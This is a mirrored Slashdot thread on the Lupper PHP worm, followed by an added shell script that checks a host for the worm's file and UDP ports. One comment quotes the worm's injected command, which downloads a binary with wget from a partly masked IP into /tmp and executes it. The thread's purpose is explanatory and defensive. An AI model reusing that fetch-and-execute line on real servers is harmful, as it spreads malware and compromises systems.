Slashdot Mirror


Linux Lupper.Worm In the Wild

jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."

12 of 363 comments

  1. PHP exploit, not directly a linux problem? by Anonymous Coward · · Score: 5, Insightful

    Seems kind of wrong to name it exclusively a linux problem.

  2. if it attacks PHP cross-platform... by frankie · · Score: 4, Insightful

    ...then it's a PHP/*nix worm, not Linux specifically.

    Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.

  3. Sadly a preview of things to come because... by Assmasher · · Score: 5, Insightful

    ...Linux is more and more popular with corporations holding valuable and important data.

    Success is a double-edged sword. ;)

  4. Conditions for infection... by xutopia · · Score: 4, Insightful

    "If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?

  5. Re:How can we get some free press? by jellomizer · · Score: 4, Insightful

    Because it seems to only affect Linux and BSD systems (With a different worm). Other systems running PHP are not affected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or Outlook Worms.

    --
    If something is so important that you feel the need to post it on the internet... It probably isn't that important.
  6. Re:Remarkably Useless page. by tomhudson · · Score: 4, Insightful

    More alarmist shit (and old news at that - The Reg reported this last week).

    Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.

    The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" version from Microsoft, and BSD/OSX/Linux users don't need an anti-virus).

  7. Re:How can we get some free press? by sqlrob · · Score: 5, Insightful

    IE Worm = Windows worm.

    Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.

  8. Re:CONTINUE: by freeweed · · Score: 4, Insightful

    Well, actually, yes. Seeing as no Linux distribution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders.

    Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.

    --
    Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
  9. Re:Linux/BSD only by mysqlrocks · · Score: 4, Insightful

    "Seriously, though; isn't everyone fairly aware that PHP ain't that secure?"

    No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.

  10. Re:Remarkably Useless page. by tomhudson · · Score: 4, Insightful

    The key word is "attempts".

    Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?

    The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.

    Now:

    1. If you haven't updated your machine in years
    2. If you have those particular scripts installed
    3. If you allow files in /tmp to be run by processes from user "nobody"

    ... that's a LOT of ifs ...

    In other words, nothing to see here but more antivirus vendor fud.

  11. You're wrong. by khasim · · Score: 4, Insightful
    "It will come up because it is true."
    No. It will keep coming up because people who don't understand security will keep bringing it up.

    There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.

    The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.
    "As for the worm, I didn't say it was a flaw in Linux, I was merely pointing out that security issues that affect Linux systems will rise as the success of Linux rises."
    That's what you believe. Yet my bank example shows that popularity has nothing to do with security.
    "Maybe you should mod that as 'master of the obvious', but it doesn't make it any less accurate."
    That is because your statement is as inaccurate as possible already.

    By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.

    And security is why this worm will not do much damage.
    http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html

    Look for "Number of Infections: 0-49".

    Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!

    What's that? "Number of Sites: 0-2"?

    That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?

    Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
  12. Re:Remarkably Useless page. by budgenator · · Score: 4, Insightful

    Step one: go to securityfocus and update all of the applications listed on your system.
    Symptoms
    Presence of the following file:
    * /tmp/lupii
    One of the following ports are listening:
            * UDP 7111
            * UDP 7222

    So running
    su -c"netstat --listening --extend --program"
    tells you if it's even running, by listing what is listening on any port, such as UDP 7111 or 7222.
    Then it would be easy to
    su -c"kill -9 pid-of-lupii"
    su -c"rm /tmp/lupii"
    su -c"touch /tmp/lupii"

    The worm apparently does this:
    echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*
    So unless your server has a vulnerability that allows privilege escalation from nobody, it's stuck in tmp directories or possibly in your html directories.

    --
    Apocalypse Cancelled, Sorry, No Ticket Refunds
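
The symptom check described in comment 12, written as a script; this is an added example, not part of the original thread. It reads a /proc/net/udp-format table instead of netstat output and also reports whether /tmp is mounted noexec, which bears on the "files in /tmp to be run" condition in comment 10. The function names and sample tables are constructed for illustration.

```shell
#!/bin/sh
# Triage for the symptoms listed above: /tmp/lupii exists, or something is
# bound to UDP 7111 / UDP 7222. Also reports whether /tmp allows execution.
# Function names and sample data are constructed for this example.

# Print "port uid" for each socket in a /proc/net/udp-format table bound to
# UDP 7111 (hex 1BC7) or UDP 7222 (hex 1C36).
lupper_udp_ports() {
    awk 'NR > 1 {
            n = split($2, addr, ":")      # local_address is HEXIP:HEXPORT
            port = toupper(addr[n])
            if (port == "1BC7") print 7111, $8
            if (port == "1C36") print 7222, $8
         }' "${1:-/proc/net/udp}"
}

# Succeed if /tmp (or /, when /tmp has no mount of its own) is mounted noexec
# according to a /proc/mounts-format table.
tmp_is_noexec() {
    awk '$2 == "/tmp"        { opts = $4; found = 1 }
         $2 == "/" && !found { opts = $4 }
         END { if (("," opts ",") ~ /,noexec,/) exit 0; exit 1 }' "${1:-/proc/mounts}"
}

# Print one finding per line. Optional arguments point the checks at saved
# copies instead of the live host.
lupper_triage() {
    marker=${1:-/tmp/lupii}; udp=${2:-/proc/net/udp}; mounts=${3:-/proc/mounts}
    [ -e "$marker" ] && echo "FILE $marker present"
    lupper_udp_ports "$udp" | while read -r port uid; do
        echo "UDP $port listening (uid $uid)"
    done
    tmp_is_noexec "$mounts" || echo "NOTE /tmp is not mounted noexec"
    return 0
}

# Offline run against constructed tables (not captured from a real host).
sample_dir=$(mktemp -d)
cat > "$sample_dir/udp" <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
  10: 00000000:0044 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 1101
  11: 00000000:1BC7 00000000:0000 07 00000000:00000000 00:00000000 00000000    99        0 1102
EOF
printf '%s\n' '/dev/sda1 / ext3 rw 0 0' \
              'tmpfs /tmp tmpfs rw,nosuid,noexec 0 0' > "$sample_dir/mounts"
lupper_triage "$sample_dir/no-such-file" "$sample_dir/udp" "$sample_dir/mounts"
```

Called with no arguments, `lupper_triage` checks the live host; pass /proc/net/udp6 as the second argument to cover IPv6 sockets as well.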